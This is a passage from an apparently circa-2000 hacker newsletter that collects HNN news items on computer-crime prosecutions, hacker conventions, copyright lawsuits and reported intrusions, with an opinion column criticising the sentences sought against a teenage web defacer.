     thinking you'll never die, and that you'll never get caught. 

     According to news reports, Coolio will be charged as an adult with 
     "unlawfully accessing a computer or otherwise disrupting computer 
     operations that results in more than $1,000 in harm." (D.A.R.E., a 
     not-for-profit organization, claims it lost $18,000 -- from the potential 
     donations that might have flooded in to the site had it not been in its 
     altered state.) 

     If convicted (as an adult), the kid could face 5 to 15 years in prison and 
     a maximum fine of $4,000 -- for one Website defacement. He has, however, 
     admitted to three, and that would earn him a potential total of 45 years in 
     jail. But he got D.A.R.E. twice -- so that could bring the number of years 
     to 60. 

     You know, I just don't think adolescent pranks usually carry these kinds of 
     consequences in the real world. 

     Tough on crime

     Reno's Department of Justice report mentions the need to teach kids in 
     schools about ethical computer use. The department plans to use a cartoon 
     character similar to McGruff the Crime Dog to ensure the friendliness of 
     the message. Something tells me they're targeting the wrong demographic 
     here. 

     The report also suggests that courts not be required to sentence all 
     computer intruders to what is now a mandatory six-month jail term for 
     unauthorized access to systems. (Note that the use of the word systems is 
     pretty vague here, as, for that matter, is the use of the term unauthorized 
     access.) 

     The motivation for the sentence reduction is not mercy. It is the opposite. 
     The attorney general's report explains: "In some instances, prosecutors 
     have exercised their discretion and elected not to charge some defendants 
     whose actions otherwise would qualify them for prosecution under that 
     section, knowing that the result would be mandatory imprisonment." 

     The Justice Department wants more convictions, and it is willing to waive 
     mandatory sentencing to get them. Imagine how conviction rate statistics 
     for computer crime might jump from 1999 to 2000 if the department's request 
     is granted. 

     Reno's report continues: "Computer hacking 'for fun' is a very serious 
     problem not only for the targets of the attacks but also for law 
     enforcement personnel who often have no way to determine the motivation for 
     and the identity of the person behind the intrusion." 

     That bothers me. Our laws permit us to determine motivation for crimes such 
     as murder in the first degree versus manslaughter -- or the difference 
     between loitering and loitering with intent. I guess it's the purview of 
     the court -- and not law enforcement -- to determine the motivation, just 
     as it's allegedly in the purview of the court -- and not the legislature -- 
     to determine sentencing. But if motivation is considered to be important in 
     murder and in loitering, why isn't it considered to be important in 
     computer intrusions? 

     Too much free speech

     In Coolio's case at least, the messages that he allegedly left on each of 
     the Webpages might serve as our first clue to his motivation. You can see 
     all of them at the attrition.org mirror site (see Resources for URL). 

     The RSA defacement was a parody of the firm's regular front page -- it was 
     even pretty funny. At D.A.R.E., he twice replaced their regular home page 
     with (pretty lame) "pro-drug" messages. But the last line in the text to 
     his CWC defacement made me laugh out loud. The entire text reads: 

          PEACE THROUGH POWER ONE VISION ONE PURPOSE 

          <starrrr> muhaha I did steal head server of Internet. If push "power" 
          button the hole net will be shutdown. I hate all you Quake Playas!! 
          !!uu!! And if push reset button the whole Internet going to DIE 

          Praise Allah and also Coolio for making this all possible! 

          If prayers do not become mandatory throughout the United States, we 
          will detonate our nuclear bombs and your President Clinton and his 
          interns will die. 

          One more thing, there is too much free speech on the internet, we want 
          you to try to do something about it. Thanks. 

     This CWC message was described by the Secret Service and reported by MSNBC 
     as a death threat to the president. 

     I respect the fact that law enforcement needs to treat death threats 
     seriously. I also respect the fact that security personnel -- in law 
     enforcement as in computer security -- are paid to be paranoid. But I do 
     think that calling Coolio's text "a death threat to the President" is 
     stretching it a bit. Dare I suggest that the D.A.R.E. site's damage 
     estimates are also exaggerated? 

     I wonder how they would estimate damages and determine the motivation for 
     an incident in which somebody's domicile was toilet-papered? After all, the 
     act involves trespassing, doesn't it? It sounds like a pretty serious 
     breach of security to me, and it could happen to anyone. After all, the 
     streets are totally unregulated. Perhaps scariest of all is the fact that 
     if it happened to me, I would never, ever be able to trace the perpetrator 
     who originated the attack back to his house. Somebody declare a state of 
     emergency, quick! 

     Is your refrigerator running?

     If instead of defacing its Website, Coolio had made prank phone calls to 
     D.A.R.E., would those calls count as unauthorized access to systems? Would 
     the Feds be calling for the power to install phone taps on all of the 
     nation's phones to catch him? Would they spend thousands of dollars in 
     taxpayer money to crisscross the entire country in search of him and then 
     threaten him with 5 to 15 years in jail? Would he have been portrayed as a 
     guilty-until-proven-innocent hoodlum in the media? 

     Not all "computer crimes" are equivalent to one another. Merely poking 
     around a system is different from defacing a Website -- which is different 
     from stealing passwords, which is different from stealing credit card 
     numbers, which is different from actually using those credit card numbers. 

     If you don't know what I mean by that, then G. William Troxler's essay 
     about different types of hacking (see Resources) might be a good starting 
     point towards understanding some different motivations for "unauthorized 
     access to systems." 

     I guess law enforcement is asking for such tough sanctions against kids 
     (felony vandalism, indeed) in the attempt to "scare them straight" and 
     teach them to "respect the law." It's OK to try to do that. But it is not 
     OK to do that with inhumane and inappropriate punishments that do not fit 
     the crime. 

     That area of law is dangerously broken. If you don't believe me, go read 
     Robert W.F. Clark's account of being arrested for computer crime ("My Bust 
     or An Odyssey of Ignorance"), the story of Bernie S, and Brian Martin's 
     essays (see Resources). I'm sure that Coolio didn't think that he would be 
     caught. I'm equally sure that prosecutors won't be interested in his 
     motivation or in investigating what he really did. 

     How soon will it be before young Americans -- of both sexes, this time -- 
     begin to run away from the United States to seek sanctuary in Canada again? 
     I guess we should be glad that at least one North American country appears 
     to be relatively sane. But I wish that the one I live in right now was, 
     too. 

     The real world

     I am not trying to say that everyone who has breached security is a kid. 
     Nor am I saying that everyone who has breached security is harmless. A 
     great deal of harm can be done -- and probably is being done, even as you 
     read this -- by people of real malice, perhaps people such as the 
     PhoneMasters (see Resources). 

     Criminals should be caught, and they should be punished. But those who 
     violate privacy, embezzle money, and steal credit card numbers don't go 
     around drawing attention to themselves by defacing Webpages. Besides, we 
     already have other laws which can be used to punish people who embezzle 
     money or commit credit card fraud. 

     But I think that Coolio should be punished, too. Being grounded (without 
     the use of his computer) for two weeks might be adequate. Taking the cough 
     syrup into account, let's make it a month. 

     With Janet Reno's report, law enforcement is asking for more money to fight 
     the looming specter of cybercrime. I'd love to know exactly how much money 
     has been spent to track down this kid from New Hampshire. If law 
     enforcement continues to dispense money willy-nilly to track adolescent 
     pranksters, they will never have enough time, money, or personnel -- no 
     matter how many times we increase their budget -- to recognize and go after 
     the real criminals -- like the ones that the government predicts will only 
     make their presence known once they are prepared to strike. Yeah, like, I 
     remember the last time that happened, when Dr No hijacked those nuclear 
     warheads off the coast of Cape Canaveral. It was really terrifying to have 
     the whole world held hostage by a supercriminal like that. Perhaps Ms Reno 
     et al. need to spend a bit more time on the Internet, and a bit less time 
     watching reruns on TV. 
      
      

      @HWA
            
142.0 HNN:Mar 29th:@tlanta Con to be Held this Weekend 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by fuller212 
      @tlanta con is a hacking/phreaking convention hosted by the South
      Eastern 2600 groups in Atlanta, Georgia. It was created in response to
      demand for another hacking convention in the South Eastern US. @tlanta
      Con will be held this Friday, Saturday and Sunday at the Ramada Inn
      and Conference Center in Midtown Atlanta.
      
      Atlanta Con
      
      http://www.atlantacon.org/
      ----------

      @HWA
         
143.0 HNN:Mar 30th:MostHateD Busted for Burglary and Theft 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Knack 
      MostHateD (Patrick W. Gregory) was arrested on Tuesday and is being
      held in Harris County Jail in Texas on charges of burglary and car
      theft. This arrest prevented him from appearing in federal court on
      Wednesday to plead guilty to defacing the White House web page. It is
      unclear what the status of his federal charges is at this time.
      
      Houston Chronicle
      
      http://www.chron.com/cs/CDA/story.hts/metropolitan/507263
      ----------
      

     March 29, 2000, 10:07PM

     Computer hacker, 19, held on charges of burglary and car theft 

     A computer hacker charged with breaking into White House, Army and Senate 
     computers is being held in Harris County Jail on unrelated charges of 
     burglary and car theft. 

     Patrick W. Gregory, 19, who lives in east Harris County, had been scheduled 
     to appear in federal court Wednesday to plead guilty to damaging computers 
     and trafficking in unauthorized personal identification numbers. His 
     Tuesday arrest prevented that. 

     "What we have him for is fairly unspectacular," said sheriff's Capt. Don 
     McWilliams. "These are not related to his prior federal cases. What we have 
     him for is not related to that at all." 

     He was arrested after the sheriff's Burglary Response Squad found enough 
     evidence to charge him with burglary and unauthorized use of a vehicle. No 
     details on that case were available. 

     Only after arresting him did sheriff's investigators discover that Gregory 
     was due to appear in federal court on the hacking charge. 

     "What happens now with his federal situation, I couldn't say," McWilliams 
     said. 

     During his days as a high-profile, high-tech bandit, Gregory called himself 
     "MostHateD" and headed a computer gang dubbed "globalHell," according to a 
     plea agreement he signed earlier this month. 

     The hacker group drew attention last May when it succeeded in getting into 
     the White House Web site. That gang also is accused of vandalizing Army and 
     Senate computers. 

     Prosecutors accuse the group of illegally accessing teleconference services 
     from AT&T, MCI and Sprint. Gregory was one of four Houston-area teens 
     arrested. 

     Gregory told the Houston Chronicle last June that globalHell numbered as 
     many as 20 people, including a handful of international members, primarily 
     in Europe. Most were youngsters trying to make a name for themselves 
     through Web-hacking, he said. 

     Gregory's hard drive, seized by government agents who raided his house, 
     revealed he was adept at ducking in and out of varied databases, including 
     the state of West Virginia's main Web page, the Philippines Bureau of 
     Internal Revenue, the British Computer Society, the American Retirement 
     Corp. and the government of Burundi.       

      @HWA
            

144.0 HNN:Mar 30th:Miramax Sued for Fugitive Game 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond
      The Miramax division of The Walt Disney Company has been sued for
      allegedly stealing the story line of 'The Fugitive Game' without the
      author's permission. 'The Fugitive Game' by Jonathan Littman details
      the arrest and capture of Kevin Mitnick. The Disney/Miramax/Dimension
      Films production of the movie Takedown premiered earlier this month in
      29 theaters in Paris, France. The suit alleges that the movie is based
      in large part on Littman's book.
      
      Business Wire - via Northern Light
      
      http://library.northernlight.com/FB20000329240000273.html?cb
      ----------

   

      Disney and Miramax Sued for 'Hacking'; Parts of 'The Fugitive Game' 
      Allegedly Stolen For New Movie


      Story Filed: Wednesday, March 29, 2000 8:18 AM EST 

      SAN FRANCISCO, Mar 29, 2000 (BUSINESS WIRE) -- The Walt Disney Company and 
      its Miramax division have made a computer hacker movie that "hacked" the 
      author's book without paying or giving credit to the writer, according to 
      a lawsuit filed yesterday by Bartko, Zankel, Tarrant & Miller, a law 
      firm representing best-selling author Jonathan Littman. 

      Littman's suit alleges that the Disney/Miramax/Dimension Films production 
      of the movie Takedown, which premiered earlier this month in 29 theatres 
      in Paris, France, was based in large part on lifted segments of Littman's 
      book, The Fugitive Game. Littman's book, published in 1996, is based 
      on the celebrated capture of computer hacker Kevin Mitnick, who was billed 
      at the time as the world's most notorious and dangerous "cyberterrorist." 

      "Jonathan Littman carefully researched the reality of the computer hacker 
      underworld," said his lawyer Bill Edlund. "His book articulated and 
      supported his view that Kevin Mitnick was not the premeditated, greedy and 
      destructive criminal portrayed by some of the media. Readers and 
      critics received Littman's The Fugitive Game as a more in-depth 
      presentation and entertaining expose of the flawed Mitnick prosecution 
      than the overblown, self-interested media hype." 

      The Fugitive Game shows Mitnick to be not a terrorist, but a computer 
      hacker, in part a misguided victim of a government entrapment effort that 
      used a sleazy informant to lure Mitnick into hacking. A key element of 
      Littman's book is his examination of the media hype spurred in New 
      York Times articles by reporter John Markoff about the Mitnick story. 

      Littman also questions Markoff's presentation of Tsutomu Shimomura, a 
      computer security specialist who used hacking techniques similar to 
      Mitnick's to trace Mitnick to his hideout in North Carolina. 

      Shimomura and Markoff wrote their version of these events in their book 
      Takedown, released at the same time as Littman's book. The book is based 
      on the seven-week pursuit of Mitnick by Shimomura that led to Mitnick's 
      arrest in February of 1995. The Disney organization purchased the 
      book and movie rights to Takedown and have now released their movie 
      version, hiring a cast that included lead actor Skeet Ulrich and 
      screenwriters led by John Danza. 

      "The screenwriter could not shape the story told in the book Takedown into 
      a workable script," said Edlund. "Once the movie project began to 
      flounder, Danza and other screenwriters lifted most of the first part of 
      Littman's The Fugitive Game for the storyline and start of the movie 
      Takedown. Littman's lawsuit is backed by e-mails allegedly sent by Danza. 
      In the e-mails, the screenwriter admits that it was 'unfortunate' that 
      Disney did not option the rights to the book The Fugitive Game to make the 
      movie Takedown. Danza goes on to describe his desire to use Littman's 
      insider information and parts of Littman's book in order to try and 
      salvage the movie project." 

      The complaint presents a detailed comparison between Littman's book and 
      the final shooting script for the movie Takedown, allegedly illustrating 
      repeated and compelling similarities between the two. According to the 
      allegations, the film Takedown and The Fugitive Game both open with 
      a scene in a strip club frequented by a government informer who reveals to 
      Mitnick information about "SAS" -- a secret Pacific Bell phone-tapping 
      system that Mitnick subsequently breaks into and uses. 

      Littman's lawsuit also contends that various themes and interpretations 
      from his book that are absent from the book Takedown appear in the movie 
      version of Takedown, including the government informer and entrapment of 
      Mitnick, and the pressure on the government to capture Mitnick 
      created by exaggerated media hype. 

      Littman seeks to prevent Disney, Miramax and the other defendants from 
      continuing to violate his copyrights by distributing the movie and to 
      recover his damages and the wrongful profits that defendants obtained from 
      the alleged theft of his work. Littman's lawyers say that the 
      Disney-Miramax plagiarism tainted Littman's work by patching it into their 
      motion picture. 

      Because of this, he is also asking for damages that he claims resulted 
      from opportunities he lost, including the opportunity for involvement with 
      other movie projects based on The Fugitive Game. 

      Distributed via COMTEX. 

      Copyright (C) 2000 Business Wire. All rights reserved. 

       

        
      CONTACT: Bartko, Zankel, Tarrant & Miller William I. Edlund, 415/291-4579 

      You may now print or save this document. (cool thanks man)      

      @HWA
            
145.0 HNN:Mar 30th:Glassbook Shattered 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Not a lamer 
      Within a day after its release, copies of the new Stephen King book
      "Riding the Bullet" were circulating around the Internet. The first
      versions were simply screen shots of the protected PDF file, but soon
      unlocked copies of the PDF were available. The unprotected PDF file
      was posted to a web site in Sweden and shortly thereafter a detailed
      explanation of the attack was posted to Usenet.
      
      eBookNet
      ZD Net
      Dejanews
      
      http://www.ebooknet.com/story.jsp?id
      http://www.zdnet.com/zdnn/stories/news/0,4586,2487101,00.html
      http://x37.deja.com/getdoc.xp?AN
      
      ----------
      
      

      @HWA
            
146.0 HNN:Mar 30th:Yahoo Sued Over Piracy 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench 
      Yesterday videogame makers Sega, Nintendo and Electronic Arts filed a
      lawsuit in U.S. District Court in San Francisco, against Yahoo. The
      suit accuses Yahoo of copyright and trademark infringement, unfair
      competition, and offering illegal devices for sale, and seeks
      compensatory damages of up to $100,000 per copyright violation, and up
      to $2,500 for sale of each 'mod chip'.
      
      Industry Standard - via Yahoo
      
      http://dailynews.yahoo.com/h/is/20000329/bs/20000329024.html
      ----------
      
     Wednesday March 29 03:16 PM EST 

      Videogame Makers Sue Yahoo Over Piracy

      Elinor Abreu

      (Industry Standard)

      Videogame makers Sega, Nintendo and Electronic Arts have filed a lawsuit 
      against Yahoo, accusing the portal of ignoring sales of counterfeit 
      videogames on its auction and mall areas.

      The lawsuit, which the manufacturers filed yesterday in U.S. District 
      Court in San Francisco, accuses Yahoo of copyright and trademark 
      infringement, unfair competition, and offering illegal devices for sale. 
      The lawsuit asks the court to order Yahoo to stop the sales. It also 
      seeks compensatory damages of up to $100,000 per copyright violation, and 
      up to $2,500 for each sale of the hardware devices - some of which are 
      called "Mod Chips" - that allow people to circumvent copyright protection, 
      says Jeff Brown, a spokesman for Redwood City, Calif.-based Electronic 
      Arts. 

      Yahoo spokeswoman Diane Hunt offers little comment on the lawsuit. "We're 
      not aware of specific situations," she says.

      The gamemakers claim people are selling the illegal items in Yahoo's 
      auction area, and in the shopping area that Yahoo leases to outside 
      merchants. "They are openly sold and labeled" with phrases like 'back up 
      copy,' 'compilation disk' and 'never published,' according to Brown. 
      "It's very widespread and blatant."

      Electronic Arts sent two letters about the matter to Yahoo's general 
      counsel last summer. It followed the letters with phone calls, Brown says 
      - all of which were ignored. At an industry meeting with Yahoo 
      representatives in December 1999, the company seemed unconcerned, he 
      adds. 

      "Yahoo's position was that they either didn't care or didn't feel the need 
      to address the problem," Brown says. "That is essentially what's forced us 
      to find a legal solution."

      Electronic Arts says the problem crops up on other Web sites, but that the 
      owners of those sites are either in discussions with Electronic Arts or 
      have taken steps to resolve the problem.

      The company doesn't know the extent of its losses to online piracy, but it 
      notes that a study by the Interactive Digital Software Association pegged 
      worldwide losses from Net piracy and counterfeiting at $3.2 billion. The 
      issue of piracy looms large for makers of computer software. That's 
      particularly true overseas, where enforcement can be lax and prices high. 
      Within the U.S., makers of music CDs are battling with companies that 
      offer ways to distribute digital music online. 

      Representatives from Nintendo and Sega, the top two gamemakers in the U.S. 
      after Electronic Arts, were not immediately available for comment. 

      MP3 Sends Music Industry Back to School 
      http://www.thestandard.com/article/display/0,1151,12393,00.html

      Copyright Case Streaming to Court 
      http://www.thestandard.com/article/display/0,1151,8505,00.html

      Judge Halts DVD Encryption Hackers 
      http://www.thestandard.com/article/display/0,1151,9063,00.html

      
      
      @HWA      
      
147.0 HNN:Mar 30th:Italian University Attacked by Brazilian Intruders 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond 
      Computers at Como's Insubria University in northern Italy have been
      compromised by intruders based in Brazil according to police. The
      Department of Physical Sciences and Mathematics suffered intrusions on
      130 different systems according to authorities. Technicians are
      working on tightening security on the network.
      
      EFE - via Northern Light
      
      http://library.northernlight.com/FA20000330540000296.html?cb
      ----------
      
   

      BRAZILIAN HACKERS BREAK INTO COMO UNIVERSITY COMPUTER NETWORK


      Story Filed: Thursday, March 30, 2000 2:41 AM EST 

      Rome, Mar 01, 2000 (EFE via COMTEX) -- Brazilian hackers broke into the 
      computer system at Como's Insubria University in northern Italy, police 
      said Wednesday, after university officials reported the incident. 

      The break-in affected 130 computers used by professors, researchers, 
      students and administrative personnel in the Department of Physical 
      Sciences and Mathematics. 

      Technicians have isolated the site from the rest of the university's data 
      transmission network while they continue to work on eliminating the 
      Brazilian virus. 

      Italian technicians said the hackers were able to break the security code 
      and gain access to the network, and used several computers to take control 
      of the e-mail system. 

      Even though an early check of the network revealed that damages to the 
      system are not substantial, departmental activity has been at a total 
      standstill for more than three days. EFE 

      mr/dd/vc 

      Copyright (c) 2000. Agencia EFE S.A. 

      (holy crap now that's one ACE killer article! and they get paid? wow - Ed)      

      @HWA
            
148.0 HNN:Mar 30th:E-commerce Site Accuses Other of Intrusions 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond 
      An e-commerce site in China has accused another site of intruding
      into its systems several times over the last few months. Leaders at
      www 8848.net have denied the charges. The case has been referred to
      Beijing's Dongcheng District Public Security Sub-bureau for possible
      prosecution.
      
      Xinhua - via Northern Lights
      
      http://library.northernlight.com/FC20000327510000102.html?cb
      ----------
      
      E-Commerce Companies Quarreling on Hacker Issues

      
      Story Filed: Monday, March 27, 2000 8:26 PM EST 

      BEIJING (March 28) XINHUA - Several Beijing-based electronic commerce 
      companies have recently been quarreling with each other over hacker issues. 

      Sources with www.dangdang.com claim that its online bookstore has been 
      hacked repeatedly this month. The sources said it believed that the 
      hacker's Internet Protocol (IP) address was from another online shopping 
      website, www 8848.net. An online discount store, www.123.com, also 
      said that a hacker from 8848 had invaded its website, said today's China 
      Daily. 

      Dangdang, who said the hacking had caused "serious economic losses," has 
      reported the case to Beijing's Dongcheng District Public Security 
      Sub-bureau and has employed an attorney for possible investigation. 

      However, the 8848 company denied the accusation and its CEO, Wang Juntao, 
      confirmed that no person from his company had been involved in the 
      behavior. 

      Wang said that technically an IP address is very easy to imitate. He also 
      indicated that some online shopping companies may hype the hacker issue. 

      The 8848 net is the biggest domestic online shopping site and Dangdang 
      claims it is the leading domestic online bookstore. 

      Wang said that dot com companies should adopt more responsible attitudes 
      on hacker issues, and should pay more attention to strengthening their 
      network security than accusing competitors. 

      The Dongcheng District police authority is cautious about the case. But an 
      official said that there are still no reports on their investigation. 

      A poll from a local company showed that more than half of its interviewees 
      who have not shopped on-line said they will not try this kind of shopping 
      in the next three months. 

      Copyright (c) 2000, Xinhua News Agency, all rights reserved.

      

      (Suck don't they? geez - Ed)      

      @HWA
            
149.0 HNN:Mar 30th:Australia To Protect Privacy of Works 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Weld Pond 
      Australia's Privacy Commissioner has published Guidelines on Workplace
      E-mail, Web Browsing and Privacy, in an effort to protect the privacy
      of workers as they use corporate computer systems. The guidelines are
      expected to be introduced in parliament within the next
      two weeks.
      
      AsiaPulse - via Northern Light
      
      http://library.northernlight.com/FA20000330910000165.html?cb
      ----------
      
      Who cares.
      

      @HWA
         
150.0 HNN:Mar 31st:Y2Hack Goes on in Israel 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by tutlex 
      Over 350 people attended the hacker convention held in Israel last
      Wednesday and Thursday. Local officials tried to shut the conference
      down but eventually relented and allowed the convention. Participants
      played 'Spot the Fed' (I thought that was a Defcon thing?) and
      participated in a conference call with Kevin Mitnick.
      
      Associated Press - via Yahoo
      USA Today
      Y2Hack
      
      http://dailynews.yahoo.com/h/ap/20000330/tc/israel_hacker_conference_1.html
      http://www.usatoday.com/life/cyber/tech/cth643.htm
      http://www.y2hack.com
      ----------
      
      
      Yahoo;
      
      Thursday March 30 1:58 PM ET 

       Hackers Hold Convention in Israel

       By LAURIE COPANS, Associated Press Writer 

       JERUSALEM (AP) - Hackers from around the world overcame interrogations, 
       censorship and an all-around bad image to hold Israel's first hacker 
       convention, wrapping up the two-day conference Thursday without a glitch.

       The 350-strong gathering was the first of its kind since the Yahoo! and 
       e-Bay commercial sites were crippled in February, reminding companies 
       across the globe of the dangers hackers can pose.

       At the request of lawmakers, Israeli police had considered banning the 
       conference, but Attorney General Eliyakim Rubinstein gave the go-ahead.

        One of the original hackers, John Draper of Fremont, Calif., said the 
        hackers wanted to put a better face on the practice.

        ``A hacker is a person who is developing programs to make them 
        better,'' Draper told The Associated Press. ``They aren't the kind of 
        people who break into computer systems. That's a cracker.''

        Draper, known by the handle ``Captain Crunch,'' helped launch the 
        hacker phenomenon. In 1971, he discovered that a toy whistle from a 
        cereal box reproduced the tone needed to open a free telephone line.

        Aware of his fame, Israeli security agents at the Los Angeles airport 
        interrogated Draper for an hour, he said, and thoroughly searched his 
        computer equipment before allowing him on the plane.

       ``There were many attempts to silence us on this,'' organizers said in a 
       summary of the gathering, released on their Web site.

       Police prevented the organizers from publishing one of the results of the 
       conference: a list of vulnerable Israeli commercial Web sites.

       To compile the list, participants played ``HackTheseSites'' with sites 
       offered up by Israeli companies. The site owners were confident no one 
       could thwart them, but they were wrong.

       When they weren't eating pizza or guzzling soda, the hackers sat bent 
       over their computer screens. They discovered that 28 percent of the 
       Israeli net is vulnerable - about the same proportion as the rest of the 
       world, according to organizers.

       Police were invited to attend the conference and even to speak, but they 
       turned down the offer, creating the game ``Spot the Fed.''

       Participants were given the challenge of finding plainclothes policemen 
       among them. If a person pointed out as suspicious was in fact a security 
       official, the official was to get an ``I am the FED'' T-shirt, and the 
        spotter an ``I spotted the FED'' shirt. But none were found out.

       Israeli lawmaker and former Science Minister Michael Eitan accepted an 
       invitation to attend. He said that hacker games like those displayed at 
       the conference were meant more to entertain ambitious youngsters than 
       cause harm.

       ``I told them that as long as they all enjoy the freedom of the Internet 
       and don't abuse this freedom, and make the public support police 
       intervention, this will work,'' Eitan said in a telephone interview.

       Participants also got to speak to their guru - convicted cyberbandit 
       Kevin Mitnick - in a conference call. The 36-year-old American bemoaned 
       the strict probation terms that ban him from using a computer or any 
       hi-tech device.

       Mitnick was released last year after serving five years in jail for 
       breaking into the computer systems of some of America's biggest 
        companies, including Motorola Inc. (NYSE:MOT - news), Novell Inc. 
        (NasdaqNM:NOVL - news) and Sun Microsystems Inc. (NasdaqNM:SUNW - 
        news)

       ``He had a lot of sympathy in the room - we all know not being able to 
       touch a computer is a worse punishment than even being in jail,'' said 
       Neora Shaul, a Tel Aviv computer programmer who helped coordinate the 
       conference.

       -

       On the Net: Conference organizers at http://www.neora.com      
       
       USA Today;
       
       Even hackers have an expo (Writer lives under a rock apparently - Ed)

       Hackers gather in Israel, despite govt. resistance

       JERUSALEM (AP) - Hackers from around the world overcame
       interrogations, censorship and an all-around bad image to hold Israel's first
       hacker convention.

        The two-day conference wrapped up Thursday without a glitch. 

        The 350-strong gathering was the first of its kind since the Yahoo! and 
        eBay commercial sites were crippled in February, reminding companies 
        across the globe of the dangers hackers can pose. 

        At the request of lawmakers, Israeli police had considered banning the 
        conference, but Attorney General Eliyakim Rubinstein gave the go-ahead. 

       One of the original hackers, John Draper of Fremont, Calif., said hackers
       wanted to put a better face on the practice. 

       ''A hacker is a person who is developing programs to make them better,''
       Draper told The Associated Press. ''They aren't the kind of people who break
       into computer systems. That's a cracker.'' 

       Draper, known by the handle ''Captain Crunch,'' helped launch the hacker
       phenomenon. In 1971, he discovered that a toy whistle from a cereal box
       reproduced the tone needed to open a free telephone line. 

       Aware of his fame, Israeli security agents at the Los Angeles airport
       interrogated Draper for an hour, he said, and thoroughly searched his
       computer equipment before allowing him on the plane. 

       ''There were many attempts to silence us on this,'' organizers said in a
       summary of the gathering, released on their Web site (www.neora.com/). 

       Police prevented the organizers from publishing one of the results of the
       conference: a list of vulnerable Israeli commercial Web sites. 

       To compile the list, participants played ''Hack These Sites'' with sites offered
       up by Israeli companies. The site owners were confident no one could
       penetrate them. Many were wrong. 

       When they weren't eating pizza or guzzling soda, the hackers sat bent over
       their computer screens. They discovered that 28% of the Israeli net is
       vulnerable - about the same proportion as the rest of the world, according to
       organizers. 

       Police were invited to attend the conference and even to speak, but they
       turned down the offer.

       Hackers engage in a game of ''Spot the Fed,'' challenging themselves to
       identify plainclothes policemen attending the conference. If a person pointed
       out as suspicious was in fact a security official, the official was to get an ''I
       am the FED'' T-shirt, and the spotter an ''I spotted the FED'' shirt. No
       security officials were identified. 

       Israeli lawmaker and former Science Minister Michael Eitan accepted an
       invitation to attend. He said that hacker games like those displayed at the
       conference were meant more to entertain ambitious youngsters than cause
       harm. 

       ''I told them that as long as they all enjoy the freedom of the Internet and don't
       abuse this freedom, and make the public support police intervention, this will
       work,'' Eitan said in a telephone interview. 

       Participants also got to speak to their guru - convicted cyberbandit Kevin
       Mitnick - on a conference call. The 36-year-old American bemoaned the
       strict probation terms that ban him from using a computer or any hi-tech
       device. 

       Mitnick was released last year after serving five years in jail for breaking into
       the computer systems of some of America's biggest companies, including
       Motorola Inc., Novell Inc. and Sun Microsystems Inc. 

       ''He had a lot of sympathy in the room - we all know not being able to touch a
       computer is a worse punishment than even being in jail,'' said Neora Shaul, a
       Tel Aviv computer programmer who helped coordinate the conference. 

       

      @HWA
            
151.0 HNN:Mar 31st:Another Member of Inferno.br Identified in Brazil 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by ps 
      The Internet Crime Sector of the Sao Paulo Police in Brazil has
      questioned JxLxMx in connection with attacks on various web sites.
      Both JxLxMx and JZ, who was identified last week, will most likely be
      prosecuted for damages, crime against the honor of various authorities
      and fraudulent use of telecommunication systems, under article 10 of
      the law 926/96.
      
      IDG News Brazil - Portuguese
      
      http://www.uol.com.br/idgnow/inet/inet2000-03-30d.shl
      ----------

      @HWA
            
152.0 HNN:Mar 31st:China Sets Up security Test Center 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Evil Wench 
      In an effort to test security problems related to hardware, database
      systems, application software systems, network equipment and related
      systems, the National Information Security Testing Evaluation and
      Certification Center has established a new branch, the Computer
      Testing Evaluation Center, in Beijing.
      
      AsiaBizTech
      
      http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID
      ----------
      
      Error


      The Reason: 
      CID$B$N@_Dj$,4V0c$C$F$$^$9!#%F%s%W%l!<%H$r3NG'$7$F2<$5$(B       
      
      nifty huh?
      

      @HWA
      
153.0 HNN:Mar 31st:Hackers Probe Physical Security of MIT 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by acopalyse 
      The Massachusetts Institute of Technology, where the word hacker was
      coined, is a physical maze of underground steam tunnels and hidden
      passageways. Hackers traverse these passageways almost on a nightly
      basis looking for new challenges.
      
      The Boston Globe
      
      http://www.boston.com/dailyglobe2/090/metro/_Hackers_skirt_security_in_late_night_MIT_treks+.shtml
      ----------
      
      See ISN story
      
      @HWA
            
154.0 HNN:Mar 31st:DVD for Linux is Now Legal 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/
      
      contributed by Brad 
      It was only a matter of time. After all the brouhaha over DeCSS someone
      has finally created a legal DVD player for the Linux platform. LinDVD
      has been created and will be marketed by Intervideo for $29.95 and
      will be available this spring.
      
      Wired
      Intervideo
      
      http://www.wired.com/news/business/0,1367,35311,00.html
      http://www.intervideo.com
      ----------
      
      Legal DVD for Penguin-Heads by Michelle Finley 

      3:00 a.m. Mar. 31, 2000 PST 

      "Woo-hoo! No more double-boot disks!" 
      yelled Linux user Joe CapoBianco, in reaction to InterVideo's announcement 
